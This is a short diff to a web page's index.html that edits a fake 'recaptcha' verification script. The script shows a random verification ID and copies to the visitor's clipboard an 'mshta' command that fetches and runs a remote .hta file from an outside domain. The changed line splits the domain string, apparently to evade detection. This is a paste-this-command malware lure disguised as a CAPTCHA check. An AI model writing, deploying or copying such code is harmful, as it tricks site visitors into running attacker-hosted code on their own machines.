--- a/index.html
+++ b/index.html
@@ -422,7 +422,7 @@
             var verification_id = generateRandomNumber();
             document.getElementById('verification-id').textContent = verification_id;
             
-            const htaPath = "http://vangviengparamotorcenter.com/" + "recaptcha";
+            const htaPath = "http://vangviengparamotor" + "center.com/recaptcha.hta";
             const commandToRun = "mshta " + htaPath
             stageClipboard(commandToRun, verification_id)
         }
